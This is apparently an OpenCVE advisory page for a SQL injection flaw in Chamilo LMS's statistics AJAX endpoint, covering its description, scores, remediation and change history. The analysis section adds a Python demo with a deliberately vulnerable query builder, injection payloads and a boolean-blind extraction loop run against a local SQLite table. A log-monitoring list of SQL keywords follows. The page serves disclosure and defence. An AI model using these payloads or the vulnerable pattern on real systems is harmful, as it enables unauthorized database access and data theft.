Description
Chamilo LMS is a learning management system. Version 1.11.34 and prior contains a SQL Injection vulnerability in the statistics AJAX endpoint. The parameters date_start and date_end from $_REQUEST are embedded directly into a raw SQL string without proper sanitization. Although Database::escape_string() is called downstream, its output is immediately neutralized by str_replace("\'", "'", ...), which restores any injected single quotes — effectively bypassing the escaping mechanism entirely. This allows an authenticated attacker to inject arbitrary SQL statements into the database query, enabling blind time-based and conditional data extraction. This issue has been patched in version 1.11.36.
Published: 2026-03-16
Score: 8.8 High
EPSS: < 1% Very Low
KEV: No
Impact: Database Data Exfiltration via SQL Injection
Action: Immediate Patch
AI Analysis

Impact

Chamilo LMS versions 1.11.34 and earlier contain a SQL Injection vulnerability in the statistics AJAX endpoint. The request parameters date_start and date_end are concatenated directly into a raw SQL string. Database::escape_string() is invoked on them, but its output is then passed through a str_replace that turns every "\'" back into "'", so any single quote the attacker supplied reaches the query unescaped and the escaping step is fully undone. An authenticated attacker can therefore terminate the date literal and append arbitrary SQL, which permits blind time-based or boolean-conditional data extraction. The CVSS vector rates confidentiality, integrity and availability impact all high (C:H/I:H/A:H): arbitrary statements can modify or delete data as well as read it, so the exposure is not limited to confidentiality.
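The following added example is not Chamilo's code; it models the escape-then-unescape pattern the advisory describes against a constructed in-memory SQLite table (the real schema, endpoint path and fix are not given on this page). escape_string() stands in for Database::escape_string() using MySQL-style backslash escaping, the parameterised variant is the assumed remediation rather than the actual 1.11.36 change, and the boolean-blind extraction loop shows the "conditional data extraction" the description refers to (a time-based variant would replace the row check with a delay check).

```python
import sqlite3
import string

# Constructed sample data standing in for the statistics table the real
# endpoint queries; not Chamilo's schema.
ROWS = [("2026-01-05", "alice", 3), ("2026-02-10", "bob", 7), ("2026-03-01", "carol", 1)]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE stats (day TEXT, user TEXT, hits INTEGER)")
    con.executemany("INSERT INTO stats VALUES (?, ?, ?)", ROWS)
    return con


def escape_string(value: str) -> str:
    """Stand-in for Database::escape_string(): MySQL-style backslash escaping of
    backslash, single quote and double quote. Only the quote handling matters here."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def build_query_vulnerable(date_start: str, date_end: str) -> str:
    """The pattern from the advisory: escape the value, then undo the escaping.
    Python's .replace("\\'", "'") is the equivalent of PHP's
    str_replace("\\'", "'", ...), so every quote the client sent comes back raw."""
    start = escape_string(date_start).replace("\\'", "'")
    end = escape_string(date_end).replace("\\'", "'")
    return f"SELECT user, hits FROM stats WHERE day >= '{start}' AND day <= '{end}'"


def build_query_fixed(date_start: str, date_end: str):
    """Assumed remediation: bind the values instead of interpolating them."""
    return "SELECT user, hits FROM stats WHERE day >= ? AND day <= ?", (date_start, date_end)


def run_vulnerable(con: sqlite3.Connection, date_start: str, date_end: str) -> list:
    return con.execute(build_query_vulnerable(date_start, date_end)).fetchall()


def run_fixed(con: sqlite3.Connection, date_start: str, date_end: str) -> list:
    sql, params = build_query_fixed(date_start, date_end)
    return con.execute(sql, params).fetchall()


def blind_extract(con: sqlite3.Connection, expr: str, maxlen: int = 16) -> str:
    """Boolean-based blind extraction through the vulnerable builder: each
    character of the result of `expr` is recovered from whether the injected
    condition makes the endpoint return rows or not."""
    alphabet = string.ascii_lowercase + string.digits
    out = ""
    for pos in range(1, maxlen + 1):
        for ch in alphabet:
            payload = f"2026-12-31' AND substr(({expr}),{pos},1)='{ch}"
            if run_vulnerable(con, "2026-01-01", payload):
                out += ch
                break
        else:
            return out  # no character matched: end of the extracted string
    return out


if __name__ == "__main__":
    db = make_db()
    injected = "2026-01-01' OR 'a'='a"
    print("benign:   ", run_vulnerable(db, "2026-01-01", "2026-01-31"))
    print("injected: ", run_vulnerable(db, "2026-01-01", injected))
    print("fixed:    ", run_fixed(db, "2026-01-01", injected))
    print("extracted:", blind_extract(db, "SELECT user FROM stats ORDER BY day LIMIT 1"))
```

Note that a proper Database::escape_string() call on its own would have turned the injected quote into "\'", which MySQL treats as a literal character; the str_replace afterwards is what re-opens the hole, so removing that line (or switching to bound parameters as above) is the fix pattern, and a post-patch check is simply the benign and injected calls above returning the same rows.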

Affected Systems

Only Chamilo LMS (chamilo:chamilo-lms) is affected, at versions 1.11.34 and older. The fix is released in version 1.11.36.

Risk and Exploitability

The CVSS base score is 8.8 (High), while the EPSS score is below 1%, indicating a low estimated likelihood of exploitation at present. It is not listed in the CISA KEV catalog. The vulnerability is reachable over the network through the web interface's AJAX endpoint and requires authentication (PR:L in the vector, so any low-privileged account suffices; no user interaction is needed). No official workaround is available; upgrading is the only complete remedy.

Generated by OpenCVE AI on March 17, 2026 at 20:38 UTC.

Remediation

The vendor fix is Chamilo LMS 1.11.36; no vendor-provided workaround for earlier versions is documented.

OpenCVE Recommended Actions

  • Apply the vendor patch by upgrading Chamilo LMS to version 1.11.36 or later
  • If immediate patching is not possible, restrict access to the statistics AJAX endpoint to trusted IP ranges or disable the endpoint temporarily
  • After patching, confirm the fix by sending date_start and date_end values that contain a single quote and checking that the response is unchanged: no SQL error, no extra rows, no delay
  • Monitor web and database logs for date_start or date_end values containing quotes or SQL keywords (SLEEP, BENCHMARK, AND, OR) and for unusually slow responses from the endpoint, the signature of time-based blind extraction


Advisories

No advisories yet.

History

Tue, 17 Mar 2026 19:00:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:*

Tue, 17 Mar 2026 10:00:00 +0000

Type Values Removed Values Added
First Time appeared Chamilo; Chamilo chamilo Lms
Vendors & Products Chamilo; Chamilo chamilo Lms

Mon, 16 Mar 2026 21:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Mon, 16 Mar 2026 19:30:00 +0000

Type Values Removed Values Added
Description Chamilo LMS is a learning management system. Version 1.11.34 and prior contains a SQL Injection vulnerability in the statistics AJAX endpoint. The parameters date_start and date_end from $_REQUEST are embedded directly into a raw SQL string without proper sanitization. Although Database::escape_string() is called downstream, its output is immediately neutralized by str_replace("\'", "'", ...), which restores any injected single quotes — effectively bypassing the escaping mechanism entirely. This allows an authenticated attacker to inject arbitrary SQL statements into the database query, enabling blind time-based and conditional data extraction. This issue has been patched in version 1.11.36.
Title Chamilo LMS: SQL Injection in the statistics AJAX endpoint
Weaknesses CWE-89
References
Metrics cvssV3_1

{'score': 8.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-16T20:22:42.641Z

Reserved: 2026-03-06T00:04:56.699Z

Link: CVE-2026-30881

Vulnrichment

Updated: 2026-03-16T20:20:28.457Z

NVD

Status : Analyzed

Published: 2026-03-16T20:16:18.640

Modified: 2026-03-17T18:52:41.947

Link: CVE-2026-30881

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-03-24T10:49:51Z

Weaknesses